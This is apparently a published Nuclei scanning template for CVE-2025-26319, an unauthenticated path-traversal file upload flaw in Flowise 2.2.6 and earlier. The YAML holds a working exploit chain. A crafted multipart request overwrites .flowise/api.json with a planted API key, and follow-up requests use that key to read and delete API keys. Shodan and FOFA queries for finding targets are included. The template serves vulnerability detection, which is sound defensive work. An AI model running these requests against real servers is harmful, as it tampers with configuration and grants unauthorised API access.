FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload

ID: CVE-2025-26319

Severity: high

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2025,flowise,fileupload,intrusive

Description

FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.

YAML Source

id: CVE-2025-26319

info:
  name: FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.
  reference:
    - https://github.com/advisories/GHSA-69jq-qr7w-j7qh
    - https://github.com/FlowiseAI/Flowise
    - https://nvd.nist.gov/vuln/detail/CVE-2025-26319
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-26319
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: FlowiseAI
    product: Flowise
    shodan-query: title:"Flowise"
    fofa-query: title="Flowise"
  tags: cve,cve2025,flowise,fileupload,intrusive

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2froot%2f/.flowise HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydTh0yj8zypRgPT1w

        ------WebKitFormBoundarydTh0yj8zypRgPT1w
        Content-Disposition: form-data; name="files";filename="api.json"
        Content-type: text/plain

        [{
        "keyName":"=",
        "apiKey":"24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ",
        "apiSecret":"8648f55db62716a6577b565efb66145b9ad8c50884c57ae8d4f03c4cd8b3ee27b1f77804d320f08bac8aa4b0dbf58a39dacbb767eb05efe1e57d5c66e5d48473.af4b3f229bd11ac5",
        "createdAt":"111",
        "id":"1111"
        }]
        ------WebKitFormBoundarydTh0yj8zypRgPT1w--

    matchers:
      - type: word
        part: body
        words:
          - 'name":'
          - 'mimeType":"text/plain'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/v1/apikey HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

      - |
        DELETE /api/v1/apikey/1111 HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'apiKey":"'
          - 'apiSecret":'
          - 'chatFlows'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205da545f91c561cc98832029237297462f13d643a5a710854194a9caaaf358855022100c0e6fa45a23d8589c141e1c931192814356d1736e5c8fb328c06a5910b58eadf:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-26319.yaml"

View on Github